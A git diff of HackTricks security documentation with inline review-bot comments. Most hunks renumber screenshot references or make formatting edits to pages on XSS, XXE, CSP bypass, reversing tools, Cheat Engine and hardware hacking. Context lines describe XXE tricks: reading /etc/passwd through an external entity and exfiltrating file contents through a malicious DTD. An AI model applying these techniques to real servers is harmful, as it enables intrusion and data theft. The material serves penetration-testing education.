-![](<../../.gitbook/assets/image (744).png>)
+![](<../../.gitbook/assets/image (747).png>)
Some useful functions for this:
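Review bot: Both image references changed here have empty alt text (`![](...)`), yet the surrounding sentences depend on them completely: "looking in the console for errors like:" and "access any element in the DOM:" say nothing if the renumbered asset is missing or wrong. Add alt text describing what each screenshot shows, or put the console error and the DOM access expression into the page as text, so that the next asset renumbering cannot silently break the explanation. The context line between the two images also needs a grammar pass ("just doing sending", "it' very common that this endpoints").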
@@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
index b7a445114..79a93c0aa 100644
--- a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -31,11 +31,11 @@ You need to **create a local empty folder to be used to store the overrides**, s
Then, in "Dev Tools" --> "Sources" **select the file** you want to override and with **right click select "Save for overrides"**.
-![](<../../.gitbook/assets/image (739).png>)
+![](<../../.gitbook/assets/image (742).png>)
This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
-![](<../../.gitbook/assets/image (591).png>)
+![](<../../.gitbook/assets/image (594).png>)
## References
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index d8114cfc6..d0778215d 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -29,11 +29,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
In the Burp's builtin browser go to the **Burp extension** and enable it:
-
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
-
+
### Inject a Canary
@@ -71,7 +71,7 @@ Detailed information can be viewed about each message by clicking on it, which i
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
-
+
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
diff --git a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index 299a6260b..dc662a291 100644
--- a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -84,7 +84,7 @@ Therefore it’s possible to bypass the CSP of a page with:
Note how the **previous CSP only permits the execution of the inline script**.\
However, **only `if1` and `if2` scripts are going to be executed but only `if1` will be able to access the parent secret**.
-![](<../../.gitbook/assets/image (369).png>)
+![](<../../.gitbook/assets/image (372).png>)
Therefore, it’s possible to **bypass a CSP if you can upload a JS file to the server and load it via iframe even with `script-src 'none'`**. This can **potentially be also done abusing a same-site JSONP endpoint**.
diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index 85b7d2a00..cb447d066 100644
--- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -231,9 +231,9 @@ The tool **Hackability inspector** from Portswigger helps to **analyze** the **a
The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
-![](<../../.gitbook/assets/image (990).png>)
+![](<../../.gitbook/assets/image (993).png>)
-![](<../../.gitbook/assets/image (326).png>)
+![](<../../.gitbook/assets/image (329).png>)
## Functions Tricks
diff --git a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index cd93c6c2e..b7b07cd02 100644
--- a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -7,14 +7,14 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
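Review bot: The `+` bullet rewrites the link destination as `https://twitter.com/hacktricks\_live`; an underscore needs no escaping inside a Markdown link destination, and anything that reads the raw file (link checkers, grep, renderers that do not unescape destinations) now sees a URL containing a backslash. Keep the destination as `https://twitter.com/hacktricks_live`. The `-`/`+` pair under the WhiteIntel heading is empty on both sides as shown, so it is a whitespace-only change that can be dropped from the patch.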
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Same Origin Method Execution
@@ -71,7 +71,7 @@ Moreover, in order for the second page to be able to use the opener object **bot
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
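Review bot: In the rewritten "Join the" bullet the link text is `@carlospolopm` while the destination is `twitter.com/hacktricks\_live`, so the label and the account it opens disagree. Since the line is being touched anyway, make the visible handle match the destination (or the reverse), and leave the underscore in the URL unescaped.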
diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index 704576456..8b15ad610 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -47,7 +47,7 @@ In this attack I'm going to test if a simple new ENTITY declaration is working
```
-![](<../.gitbook/assets/image (867).png>)
+![](<../.gitbook/assets/image (870).png>)
### Read file
@@ -61,7 +61,7 @@ In this first case notice that SYSTEM "_\*\*file:///\*\*etc/passwd_" will also w
&example;
```
-![](<../.gitbook/assets/image (83).png>)
+![](<../.gitbook/assets/image (86).png>)
This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)
@@ -85,7 +85,7 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
```
-![](<../.gitbook/assets/image (750).png>)
+![](<../.gitbook/assets/image (753).png>)
### Directory listing
@@ -121,7 +121,7 @@ Using the **previously commented technique** you can make the server access a se
### "Blind" SSRF - Exfiltrate data out-of-band
-**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (**for **multi-line files you could try to ex-filtrate it via** _**ftp://**_ using this basic server for example [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). This explanation is based in** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
+**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via \_ftp://**\_ using this basic server for example [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). This explanation is based in** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
In the given malicious DTD, a series of steps are conducted to exfiltrate data:
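Review bot: The `+` paragraph replaces the italic `_**ftp://**_` with `\_ftp://**\_`, so the underscores are now escaped literals and the `**` after `ftp://` closes the bold run opened at the start of the paragraph; the rendered text will show stray `_` characters around the scheme and lose the emphasis. Write the scheme as an inline code span (`ftp://`) and keep the bold markers balanced around the parenthetical, then check the rendered page before merging.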
@@ -178,7 +178,7 @@ The malicious external DTD can be invoked with the following XML:
Upon execution, the web server's response should include an error message displaying the contents of the `/etc/passwd` file.
-![](<../.gitbook/assets/image (806).png>)
+![](<../.gitbook/assets/image (809).png>)
_**Please notice that external DTD allows us to include one entity inside the second (****`eval`****), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_
@@ -226,7 +226,7 @@ The outlined steps are executed by this DTD:
3;1
```
-![](<../.gitbook/assets/image (622).png>)
+![](<../.gitbook/assets/image (625).png>)
As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists:
@@ -344,7 +344,7 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
#### Quadratic Blowup Attack
-![](<../.gitbook/assets/image (524).png>)
+![](<../.gitbook/assets/image (527).png>)
#### Getting NTML
@@ -790,10 +790,10 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
* [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\
* [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
-
-
+
{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md
index 5123ec1f9..dee5d85c7 100644
--- a/reversing/reversing-tools-basic-methods/README.md
+++ b/reversing/reversing-tools-basic-methods/README.md
@@ -81,7 +81,7 @@ In order to debug code using DNSpy you need to:
First, change the **Assembly attributes** related to **debugging**:
-![](<../../.gitbook/assets/image (970).png>)
+![](<../../.gitbook/assets/image (973).png>)
From:
@@ -104,7 +104,7 @@ And click on **compile**:
Then save the new file via _**File >> Save module...**_:
-![](<../../.gitbook/assets/image (599).png>)
+![](<../../.gitbook/assets/image (602).png>)
This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
@@ -116,25 +116,25 @@ iisreset /noforce
Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**:
-![](<../../.gitbook/assets/image (315).png>)
+![](<../../.gitbook/assets/image (318).png>)
Then select **w3wp.exe** to attach to the **IIS server** and click **attach**:
-![](<../../.gitbook/assets/image (110).png>)
+![](<../../.gitbook/assets/image (113).png>)
Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug >> Break All_ and then click on _**Debug >> Windows >> Modules**_:
-![](<../../.gitbook/assets/image (129).png>)
+![](<../../.gitbook/assets/image (132).png>)
-![](<../../.gitbook/assets/image (831).png>)
+![](<../../.gitbook/assets/image (834).png>)
Click any module on **Modules** and select **Open All Modules**:
-![](<../../.gitbook/assets/image (919).png>)
+![](<../../.gitbook/assets/image (922).png>)
Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
-![](<../../.gitbook/assets/image (336).png>)
+![](<../../.gitbook/assets/image (339).png>)
## Java decompiler
@@ -149,11 +149,11 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
* Select **Windbg** debugger
* Select "**Suspend on library load/unload**"
-![](<../../.gitbook/assets/image (865).png>)
+![](<../../.gitbook/assets/image (868).png>)
* Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call:
-![](<../../.gitbook/assets/image (701).png>)
+![](<../../.gitbook/assets/image (704).png>)
Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
@@ -168,7 +168,7 @@ But, how can you get to the code of the DLL that was lodaded? Using this method,
Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**:
-![](<../../.gitbook/assets/image (839).png>)
+![](<../../.gitbook/assets/image (842).png>)
Then, looking to this ca see when the execution was stopped in the dll you want to debug.
@@ -182,7 +182,7 @@ Then, looking to this ca see when the execution was stopped in the dll you want
[**PiNCE**](https://github.com/korcankaraokcu/PINCE) is a front-end/reverse engineering tool for the GNU Project Debugger (GDB), focused on games. However, it can be used for any reverse-engineering related stuff
-[**Decompiler Explorer**](https://dogbolt.org/) is a web front-end to a number of decompilers. This web service lets you compare the output of different decompilers on small executables.
+[**Decompiler Explorer**](https://dogbolt.org/) is a web front-end to a number of decompilers. This web service lets you compare the output of different decompilers on small executables.
## ARM & MIPS
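Review bot: The removed and added "Decompiler Explorer" lines are textually identical as shown, which means the only difference is invisible whitespace (a trailing space or a non-breaking space). Confirm which character changed and that it is intended; otherwise drop the line from the patch so the hunk carries only the image renumbering.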
@@ -206,7 +206,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
-![](<../../.gitbook/assets/image (506).png>)
+![](<../../.gitbook/assets/image (509).png>)
You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
@@ -216,17 +216,17 @@ You can download a compiled version of [jmp2it inside the releases page](https:/
Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't:
-![](<../../.gitbook/assets/image (559).png>)
+![](<../../.gitbook/assets/image (562).png>)
In order to start the emulation in the place you want to, set a bp there and apparently cutter will automatically start the emulation from there:
-![](<../../.gitbook/assets/image (586).png>)
+![](<../../.gitbook/assets/image (589).png>)
-![](<../../.gitbook/assets/image (384).png>)
+![](<../../.gitbook/assets/image (387).png>)
You can see the stack for example inside a hex dump:
-![](<../../.gitbook/assets/image (183).png>)
+![](<../../.gitbook/assets/image (186).png>)
### Deobfuscating shellcode and getting executed functions
@@ -244,7 +244,7 @@ scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
scDbg also counts with a graphical launcher where you can select the options you want and execute the shellcode
-![](<../../.gitbook/assets/image (255).png>)
+![](<../../.gitbook/assets/image (258).png>)
The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
@@ -274,7 +274,7 @@ If you are playing a **CTF, this workaround to find the flag** could be very use
To find the **entry point** search the functions by `::main` like in:
-![](<../../.gitbook/assets/image (1077).png>)
+![](<../../.gitbook/assets/image (1080).png>)
In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
@@ -318,7 +318,7 @@ If you get the **binary** of a GBA game you can use different tools to **emulate
In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_\*\* \*\* you can see how to press the Game Boy Advance **buttons**
-![](<../../.gitbook/assets/image (578).png>)
+![](<../../.gitbook/assets/image (581).png>)
When pressed, each **key has a value** to identify it:
@@ -337,7 +337,7 @@ L = 256
So, in this kind of program, the interesting part will be **how the program treats the user input**. In the address **0x4000130** you will find the commonly found function: **KEYINPUT**.
-![](<../../.gitbook/assets/image (444).png>)
+![](<../../.gitbook/assets/image (447).png>)
In the previous image you can find that the function is called from **FUN\_080015a8** (addresses: _0x080015fa_ and _0x080017ac_).
diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 77d4b3482..66eecbcd4 100644
--- a/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -222,7 +222,7 @@ if __name__ == '__main__':
In this scenario, the input was taken with `scanf("%u %u")` and the value `"1 1"` was given, so the values **`0x00000001`** of the stack come from the **user input**. You can see how this values starts in `$ebp - 8`. Therefore, in the code we have **subtracted 8 bytes to `$esp` (as in that moment `$ebp` and `$esp` had the same value)** and then we have pushed the BVS.
-![](<../../../.gitbook/assets/image (133).png>)
+![](<../../../.gitbook/assets/image (136).png>)
### Static Memory values (Global variables)
diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/reversing/reversing-tools-basic-methods/cheat-engine.md
index af90e78a3..9b23d4b94 100644
--- a/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -19,36 +19,36 @@ When you download and run it, you are **presented** with a **tutorial** of how t
## What are you searching?
-![](<../../.gitbook/assets/image (759).png>)
+![](<../../.gitbook/assets/image (762).png>)
This tool is very useful to find **where some value** (usually a number) **is stored in the memory** of a program.\
**Usually numbers** are stored in **4bytes** form, but you could also find them in **double** or **float** formats, or you may want to look for something **different from a number**. For that reason you need to be sure you **select** what you want to **search for**:
-![](<../../.gitbook/assets/image (321).png>)
+![](<../../.gitbook/assets/image (324).png>)
Also you can indicate **different** types of **searches**:
-![](<../../.gitbook/assets/image (307).png>)
+![](<../../.gitbook/assets/image (311).png>)
You can also check the box to **stop the game while scanning the memory**:
-![](<../../.gitbook/assets/image (1049).png>)
+![](<../../.gitbook/assets/image (1052).png>)
### Hotkeys
In _**Edit --> Settings --> Hotkeys**_ you can set different **hotkeys** for different purposes like **stopping** the **game** (which is quiet useful if at some point you want to scan the memory). Other options are available:
-![](<../../.gitbook/assets/image (861).png>)
+![](<../../.gitbook/assets/image (864).png>)
## Modifying the value
Once you **found** where is the **value** you are **looking for** (more about this in the following steps) you can **modify it** double clicking it, then double clicking its value:
-![](<../../.gitbook/assets/image (560).png>)
+![](<../../.gitbook/assets/image (563).png>)
And finally **marking the check** to get the modification done in the memory:
-![](<../../.gitbook/assets/image (382).png>)
+![](<../../.gitbook/assets/image (385).png>)
The **change** to the **memory** will be immediately **applied** (note that until the game doesn't use this value again the value **won't be updated in the game**).
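Review bot: Every image reference in this hunk moves up by 3 (759 to 762, 321 to 324, 1049 to 1052, 861 to 864, 560 to 563, 382 to 385) except `image (307).png`, which becomes `image (311).png`, a step of 4. Check that 311 really is the screenshot for "Also you can indicate **different** types of **searches**" and not its neighbour; a wrong number here renders without any error and only shows up as a mismatched picture.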
@@ -60,11 +60,11 @@ So, we are going to suppose that there is an important value (like the life of y
Supposing you are looking for the value 100, you **perform a scan** searching for that value and you find a lot of coincidences:
-![](<../../.gitbook/assets/image (105).png>)
+![](<../../.gitbook/assets/image (108).png>)
Then, you do something so that **value changes**, and you **stop** the game and **perform** a **next scan**:
-![](<../../.gitbook/assets/image (681).png>)
+![](<../../.gitbook/assets/image (684).png>)
Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
_If you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
@@ -75,21 +75,21 @@ In the scenario you **don't know the value** but you know **how to make it chang
So, start by performing a scan of type "**Unknown initial value**":
-![](<../../.gitbook/assets/image (887).png>)
+![](<../../.gitbook/assets/image (890).png>)
Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) and perform a **next scan**:
-![](<../../.gitbook/assets/image (368).png>)
+![](<../../.gitbook/assets/image (371).png>)
You will be presented **all the values that were modified in the selected way**:
-![](<../../.gitbook/assets/image (566).png>)
+![](<../../.gitbook/assets/image (569).png>)
Once you have found your value, you can modify it.
Note that there are a **lot of possible changes** and you can do these **steps as much as you want** to filter the results:
-![](<../../.gitbook/assets/image (571).png>)
+![](<../../.gitbook/assets/image (574).png>)
### Random Memory Address - Finding the code
@@ -97,18 +97,18 @@ Until know we learnt how to find an address storing a value, but it's highly pro
Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**":
-![](<../../.gitbook/assets/image (1064).png>)
+![](<../../.gitbook/assets/image (1067).png>)
The **first option** is useful to know which **parts** of the **code** are **using** this **address** (which is useful for more things like **knowing where you can modify the code** of the game).\
The **second option** is more **specific**, and will be more helpful in this case as we are interested in knowing **from where this value is being written**.
Once you have selected one of those options, the **debugger** will be **attached** to the program and a new **empty window** will appear. Now, **play** the **game** and **modify** that **value** (without restarting the game). The **window** should be **filled** with the **addresses** that are **modifying** the **value**:
-![](<../../.gitbook/assets/image (88).png>)
+![](<../../.gitbook/assets/image (91).png>)
Now that you found the address it's modifying the value you can **modify the code at your pleasure** (Cheat Engine allows you to modify it for NOPs real quick):
-![](<../../.gitbook/assets/image (1054).png>)
+![](<../../.gitbook/assets/image (1057).png>)
So, you can now modify it so the code won't affect your number, or will always affect in a positive way.
@@ -116,28 +116,28 @@ So, you can now modify it so the code won't affect your number, or will always a
Following the previous steps, find where the value you are interested is. Then, using "**Find out what writes to this address**" find out which address writes this value and double click on it to get the disassembly view:
-![](<../../.gitbook/assets/image (1036).png>)
+![](<../../.gitbook/assets/image (1039).png>)
Then, perform a new scan **searching for the hex value between "\[]"** (the value of $edx in this case):
-![](<../../.gitbook/assets/image (991).png>)
+![](<../../.gitbook/assets/image (994).png>)
(_If several appear you usually need the smallest address one_)\
Now, we have f**ound the pointer that will be modifying the value we are interested in**.
Click on "**Add Address Manually**":
-![](<../../.gitbook/assets/image (987).png>)
+![](<../../.gitbook/assets/image (990).png>)
Now, click on the "Pointer" check box and add the found address in the text box (in this scenario, the found address in the previous image was "Tutorial-i386.exe"+2426B0):
-![](<../../.gitbook/assets/image (388).png>)
+![](<../../.gitbook/assets/image (392).png>)
(Note how the first "Address" is automatically populated from the pointer address you introduce)
Click OK and a new pointer will be created:
-![](<../../.gitbook/assets/image (305).png>)
+![](<../../.gitbook/assets/image (308).png>)
Now, every time you modifies that value you are **modifying the important value even if the memory address where the value is is different.**
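Review bot: `image (388).png` becomes `image (392).png` under the "Pointer" check box step, while the other four references in this hunk shift by 3 (1036 to 1039, 991 to 994, 987 to 990, 305 to 308). Verify that 392 shows the pointer dialog with "Tutorial-i386.exe"+2426B0 that the sentence above it describes, since the text refers to "the found address in the previous image".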
@@ -147,24 +147,24 @@ Code injection is a technique where you inject a piece of code into the target p
So, imagine you have found the address that is subtracting 1 to the life of your player:
-![](<../../.gitbook/assets/image (200).png>)
+![](<../../.gitbook/assets/image (203).png>)
Click on Show disassembler to get the **disassemble code**.\
Then, click **CTRL+a** to invoke the Auto assemble window and select _**Template --> Code Injection**_
-![](<../../.gitbook/assets/image (899).png>)
+![](<../../.gitbook/assets/image (902).png>)
Fill the **address of the instruction you want to modify** (this is usually autofilled):
-![](<../../.gitbook/assets/image (741).png>)
+![](<../../.gitbook/assets/image (744).png>)
A template will be generated:
-![](<../../.gitbook/assets/image (941).png>)
+![](<../../.gitbook/assets/image (944).png>)
So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed\*\*.\*\* In this example the injected code will add 2 points instead of substracting 1:
-![](<../../.gitbook/assets/image (518).png>)
+![](<../../.gitbook/assets/image (521).png>)
**Click on execute and so on and your code should be injected in the program changing the behaviour of the functionality!**
diff --git a/reversing/word-macros.md b/reversing/word-macros.md
index f35ea5077..83022975f 100644
--- a/reversing/word-macros.md
+++ b/reversing/word-macros.md
@@ -19,13 +19,13 @@ Other ways to support HackTricks:
It's very common to find **junk code that is never used** to make the reversing of the macro more difficult.\
For example, in the following image you can see that and If that is never going to be true is used to execute some junk and useless code.
-![](<../.gitbook/assets/image (365).png>)
+![](<../.gitbook/assets/image (369).png>)
### Macro Forms
Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes** (a text box can be hiding other text boxes):
-![](<../.gitbook/assets/image (341).png>)
+![](<../.gitbook/assets/image (344).png>)
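Review bot: The two renames in this hunk are not consistent: the junk-code screenshot goes from 365 to 369 while the macro-form one goes from 341 to 344. Confirm that `image (369).png` is the never-true `If` example the paragraph refers to. Both images also have empty alt text (`![]`), so a reader of the raw file or a broken render has no way to tell what should be shown; a short alt string would make a wrong reference detectable.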
diff --git a/todo/hardware-hacking/fault_injection_attacks.md b/todo/hardware-hacking/fault_injection_attacks.md
new file mode 100644
index 000000000..ad6fa7a35
--- /dev/null
+++ b/todo/hardware-hacking/fault_injection_attacks.md
@@ -0,0 +1,5 @@
+# Fault Injection Attacks
+
+Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
+
+There are a lot of methods and mediums for injecting fault into an electronic circuit.
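Review bot: The added paragraph needs a proofread before merge: "Fault injections attacks includes", "distrubance", "it's behaviour" (should be "its"), "certian", "resulting to disclose" and "This attacks opens" are all in the first `+` paragraph. The page also ends at "There are a lot of methods and mediums for injecting fault into an electronic circuit." without naming any, so either list the methods the sentence promises or mark the file as a stub so readers do not take it as complete.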
diff --git a/todo/hardware-hacking/i2c.md b/todo/hardware-hacking/i2c.md
index 852a2ba0d..c488de4fb 100644
--- a/todo/hardware-hacking/i2c.md
+++ b/todo/hardware-hacking/i2c.md
@@ -61,11 +61,11 @@ As you can see in the previous command line it said that it found 0 errors. This
To connect with the bus pirate you can follow the docs:
-![](<../../.gitbook/assets/image (481).png>)
+![](<../../.gitbook/assets/image (484).png>)
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
-![](<../../.gitbook/assets/image (961).png>)
+![](<../../.gitbook/assets/image (964).png>)
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
@@ -173,7 +173,7 @@ NACK
In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
-![](<../../.gitbook/assets/image (163).png>)
+![](<../../.gitbook/assets/image (166).png>)
```bash
I2C>m
diff --git a/todo/hardware-hacking/jtag.md b/todo/hardware-hacking/jtag.md
index d7d27e87f..efaa180af 100644
--- a/todo/hardware-hacking/jtag.md
+++ b/todo/hardware-hacking/jtag.md
@@ -24,14 +24,14 @@ In the **Raspberry PI** you can only use **pins from 1 to 6** (6pins, so you wil
In Arduino, after connecting the cables (pin 2 to 11 to JTAG pins and Arduino GND to the baseboard GND), **load the JTAGenum program in Arduino** and in the Serial Monitor send a **`h`** (command for help) and you should see the help:
-![](<../../.gitbook/assets/image (936).png>)
+![](<../../.gitbook/assets/image (939).png>)
-![](<../../.gitbook/assets/image (575).png>)
+![](<../../.gitbook/assets/image (578).png>)
Configure **"No line ending" and 115200baud**.\
Send the command s to start scanning:
-![](<../../.gitbook/assets/image (771).png>)
+![](<../../.gitbook/assets/image (774).png>)
If you are contacting a JTAG, you will find one or several **lines starting by FOUND!** indicating the pins of JTAG.
diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md
index ad16f1c06..2b91f3db9 100644
--- a/todo/hardware-hacking/radio.md
+++ b/todo/hardware-hacking/radio.md
@@ -23,11 +23,11 @@ Other ways to support HackTricks:
After installing there are a few things that you could consider configuring.\
In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\\
-![](<../../.gitbook/assets/image (242).png>)
+![](<../../.gitbook/assets/image (245).png>)
In the GUI behaviour it's recommended to enable a few things if your PC support it:
-![](<../../.gitbook/assets/image (469).png>)
+![](<../../.gitbook/assets/image (472).png>)
{% hint style="info" %}
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
